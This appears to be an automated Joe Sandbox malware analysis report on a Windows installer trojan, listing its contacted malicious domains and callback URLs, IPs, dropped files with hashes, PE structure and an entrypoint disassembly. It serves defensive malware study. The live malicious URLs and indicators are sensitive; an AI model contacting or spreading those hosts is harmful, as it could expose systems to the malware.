          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ80%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tententacleshydro.com
          		34.102.136.180
          		truefalseunknown
          www.contecoliving.com
          		69.163.220.52
          		truetrueunknown
          constipationhub.com
          		34.102.136.180
          		truefalseunknown
          identityofplace.com
          		34.102.136.180
          		truefalse
            		unknown
            www.identityofplace.com
            		unknown
            		unknowntrue
              		unknown
              www.tententacleshydro.com
              		unknown
              		unknowntrue
                		unknown
                www.constipationhub.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.middlehambooks.com/klf/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85Dtrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Upfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Upfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2wNETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://www.tiro.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.%s.comPAexplorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		low
                                    http://www.fonts.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      34.102.136.180
                                      		tententacleshydro.comUnited States
                                      		15169GOOGLEUSfalse
                                      69.163.220.52
                                      		www.contecoliving.comUnited States
                                      		26347DREAMHOST-ASUStrue

                                      General Information

                                      Joe Sandbox Version:31.0.0 Emerald
                                      Analysis ID:383918
                                      Start date:08.04.2021
                                      Start time:12:25:53
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Sample file name:Y4U48592345670954.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/3@4/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 27.9% (good quality ratio 25.5%)
                                      • Quality average: 74.3%
                                      • Quality standard deviation: 30.9%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.43.139.144, 13.88.21.125, 20.82.210.154, 104.42.151.234, 52.155.217.156, 20.54.26.129, 23.10.249.26, 23.10.249.43, 20.82.209.183
                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      DREAMHOST-ASUSinvoice.exeGet hashmaliciousBrowse
                                      • 69.163.228.164
                                      56_012021.docGet hashmaliciousBrowse
                                      • 208.97.151.226
                                      sample.exeGet hashmaliciousBrowse
                                      • 173.236.229.64
                                      ARBmDNJS7m.exeGet hashmaliciousBrowse
                                      • 208.113.205.238
                                      New _Items.Xlsx.Pdf.exeGet hashmaliciousBrowse
                                      • 66.33.222.0
                                      Payment TT Copy. PDF.exeGet hashmaliciousBrowse
                                      • 66.33.222.0
                                      4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                      • 69.163.228.230
                                      eogHAzg03I.exeGet hashmaliciousBrowse
                                      • 67.205.11.26
                                      purchase order#034.exeGet hashmaliciousBrowse
                                      • 69.163.228.230
                                      BSG_ptf.exeGet hashmaliciousBrowse
                                      • 69.163.167.164
                                      nxHN51lQwj.exeGet hashmaliciousBrowse
                                      • 69.163.225.40
                                      kw8VTJCVE6.exeGet hashmaliciousBrowse
                                      • 69.163.225.40
                                      9JZ1Nq9jXa.exeGet hashmaliciousBrowse
                                      • 69.163.225.40
                                      RFQ 204871 AGC_pdf.exeGet hashmaliciousBrowse
                                      • 69.163.167.164
                                      RAQ11986.exeGet hashmaliciousBrowse
                                      • 69.163.225.47
                                      ORDER LIST.xlsxGet hashmaliciousBrowse
                                      • 173.236.158.78
                                      swift copy pdf.exeGet hashmaliciousBrowse
                                      • 173.236.165.225
                                      Inquiry pdf.exeGet hashmaliciousBrowse
                                      • 173.236.165.225
                                      SHIPPING DOCS.xlsxGet hashmaliciousBrowse
                                      • 69.163.157.222
                                      RFQ SECO WARWICK Germany.docGet hashmaliciousBrowse
                                      • 173.236.190.98

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\3kusvrc50ywls0rc
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):185856
                                      Entropy (8bit):7.999086744314393
                                      Encrypted:true
                                      SSDEEP:3072:DJrpwn8nX8cVji9mN7vyqjC2Hw1cfy6VPbPixK3gf+HiL1mVURAZkylpmbkxQFGh:rDX8Ai9mv9eMy6VP+xNYkm0spiNGh
                                      MD5:04F2CCB649106E4B8403BA47BF0B161D
                                      SHA1:D686FB1081635869059CE0034FD1EDD0A01E35E7
                                      SHA-256:D60A87D9CE46455806CDE5F3A8515DF1A515C9062139C76D14BF75BEAECAD527
                                      SHA-512:12999CFF3B8442865DFC09508CF13F4829A279172EB8A85E5D92889C297894AEE0EAAB04149958D952C17CB9AD8F7816EE9DD6BCD758CD7D59D69441F4AC859F
                                      Malicious:false
                                      Reputation:low
                                      Preview: .....=.3m.y..".RO7]..^.i..0...l.M..?.......f.UkZod..Zg@3......U...u...E<./..+.@6.../...XP.f...^GO...aA#jO.~.="g(.f....Tk......Q.^[L.9...}.......E..]9...?ro.0fFi..o..?. ..R...m....Vr..?.1..htVEJ...-..q....'i..D.d.(...K.A..z;...."..jX..y.qw.P"<....I..*\.)..6........'.....@...m...9..]V......)M.D38..1.w.h^..T.K.P.....UM.,Z..Ds.y.....I..s.h`;S...I....Y.mK7...4..2.}]./..>c!.~D........4.V...J...L..2.j.....o..h..R`..#.J.....n!....G.L.z..r.Y.......<s.M.[.....<X..=.+....D2....z...}.......3......(.>H..%O..;x....p...H...{.E..F.1.L..?Ld..Q....g{.+.h%.^4@...V.3._..pa@s...u...-.h...i,.#-...u...v..e-..3...Vk.=f8$,.K.a...O..fShD.J.T..{9.....88a.......O../X..D5*....W7.F..&W...w..........v.T.}I&.XT]..... .T.g[.}>)%Q....V..N....Z.Y..)~W.Z....>....g..]dA...'...T\.e..*..Y.-S.s._.y3..:....r......@.v]9.p'...&..@...x..D>u#.>.%.jO..\...<..4..K..@..Q.W......9..[cO.j/...Y.dX.B.r..A.nk.c.>.&..,_....H]...P+s7....^n..Eg.*o.(...X.;.b{H$>...7.f..R.....pK.:R{.......T^<.tJ
                                      C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):4.1271255992731
                                      Encrypted:false
                                      SSDEEP:48:vpghendHRWgTJzDrscX/oh/jTLNuLebdsbriB4ZYmRz:BYIWcxtXghrnktfiuZVR
                                      MD5:823D8D2962EF7A632F256759B088FFF8
                                      SHA1:263245E0C8D9EF7FACDE174BE1CEE3FAA9A846BA
                                      SHA-256:7DDF5362A2603771F85D4CE7341B647FE839005820F52C47B3391D38F839E89F
                                      SHA-512:6563CA17DE1820B7DED3D39B106D0C0FB4C8BBC3EF2A5B88DDBD30FA8C2A4CBDB521D5C6960281B930BAA126F2FE637CB605ECA2EC4C3709AD16AC63E2B3D3D2
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 6%
                                      Reputation:low
                                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...L.n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L...$ ..............................................("...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\sn7trv7b4c9aukp2
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6661
                                      Entropy (8bit):7.966207593101436
                                      Encrypted:false
                                      SSDEEP:192:qdeemJBzAS2B25DiXlBUrBKli0qLnnZAvAVnHd:SepQB2FSbUF6snZbVHd
                                      MD5:9C2EE18B684CD1990D6BB0140F48B8EF
                                      SHA1:D2AC6BFA52B3DB413E8FFEB941DA0A8CC6ABE263
                                      SHA-256:1723655FB6D497AC55E316181F4243F8CF2D49578C714F8997DAC9966D71659E
                                      SHA-512:BC5DAF45130DB66C1E5A86880F3F3B49E9313F14B10C165FBC87A5702014B668AE7559D4B1958F7CF41941B6B6DF674E15C78379B607CC600C4B007CC4368C14
                                      Malicious:false
                                      Reputation:low
                                      Preview: ...I|..Q...p.P....W.....b..vc........j. .T?..Rg.k..+.gWC.c.[.3..s.`.X.0.n.oeM].5.{.|2Yj..BSx../-g..?Y}.~<d4..LW...A.9...]...>.6...kT.MK.C....Y.ZH...#..V.W.... ..c.d.8..-..`.i......e...%.t.4..M.*.y..1....'y...6..|.t~...C...q....@.#j...&L.M.p{..sU.~.~P......zV....W.....y_.P.T^..PP.N..h.vR[m.3.[.U.adY.Q<.^.d...._9.k.c.;Uy.zhf`..8cv.w-:e..=i...:.2..Jg...7./..G-...D8<...;R.SIKA...AO.PFL>....\.U./K....a.b....+..^._....(..k.l...#.r..2.MT..p.../-...\.g.;<......78....BC..A....?..=.AJ...M..)A.2w.:.M.,....qQ...F..U..,....Y]...U..+....,'..l.... U.N..+.!,.'4.lr.s./....h(.,.p..\ .=..0p.,.x..D0...0.[..~..|,S..G..8..V....,[.R....T..4.v.S...[."...G(N. .K..sM.g.^.+3.`..]e(m..q..w..3.oo=5...*d.y,2...8y...6....9.....#....*>H........)mU...(zO.....[....r]...G..w..0..YH.....6.T_..Y.J....)...fVD...>3..(r.u..u./%q.nW.pp.....Ur.xw..c.....J.eL.~...6.7.7...Q.......:....T...O.P...U....U.".UW.dabb...bd.G.._...i....gf..4.....~4..qP..1...n<.=...B..B.B.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.919280210748743
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Y4U48592345670954.exe
                                      File size:227550
                                      MD5:e8e69391d3a931e6638adaebf6a339f6
                                      SHA1:29c02e786c6f8b343bc0f05a1195ff5215d21e63
                                      SHA256:20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
                                      SHA512:da123a74a0e598d6d1e1886d18a1141da3ea6403e03984e01a2ffc76723ccc3837cf8dc652bbeae2e435278e321a9b31ed434a79215a6b67fe7c81524b1fde5e
                                      SSDEEP:6144:HdliJDX8Ai9mv9eMy6VP+xNYkm0spiNGU:jiB8AiEVeJF
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                      File Icon

                                      Icon Hash:b2a88c96b2ca6a72

                                      Static PE Info

                                      General

                                      Entrypoint:0x40314a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 0000017Ch
                                      push ebx
                                      push ebp
                                      push esi
                                      xor esi, esi
                                      push edi
                                      mov dword ptr [esp+18h], esi
                                      mov ebp, 00409240h
                                      mov byte ptr [esp+10h], 00000020h
                                      call dword ptr [00407030h]
                                      push esi
                                      call dword ptr [00407270h]
                                      mov dword ptr [007A3030h], eax
                                      push esi
                                      lea eax, dword ptr [esp+30h]
                                      push 00000160h
                                      push eax
                                      push esi
                                      push 0079E540h
                                      call dword ptr [00407158h]
                                      push 00409230h
                                      push 007A2780h
                                      call 00007FA960977D68h
                                      mov ebx, 007AA400h
                                      push ebx
                                      push 00000400h
                                      call dword ptr [004070B4h]
                                      call 00007FA9609754A9h
                                      test eax, eax
                                      jne 00007FA960975566h
                                      push 000003FBh
                                      push ebx
                                      call dword ptr [004070B0h]
                                      push 00409228h
                                      push ebx
                                      call 00007FA960977D53h
                                      call 00007FA960975489h
                                      test eax, eax
                                      je 00007FA960975682h
                                      mov edi, 007A9000h
                                      push edi
                                      call dword ptr [00407140h]
                                      call dword ptr [004070ACh]
                                      push eax
                                      push edi
                                      call 00007FA960977D11h
                                      push 00000000h
                                      call dword ptr [00407108h]
                                      cmp byte ptr [007A9000h], 00000022h
                                      mov dword ptr [007A2F80h], eax
                                      mov eax, edi
                                      jne 00007FA96097554Ch
                                      mov byte ptr [esp+10h], 00000022h
                                      mov eax, 00000001h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                      RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                      RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                      RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                      RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                      RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                      Imports

                                      DLLImport
                                      KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                      USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
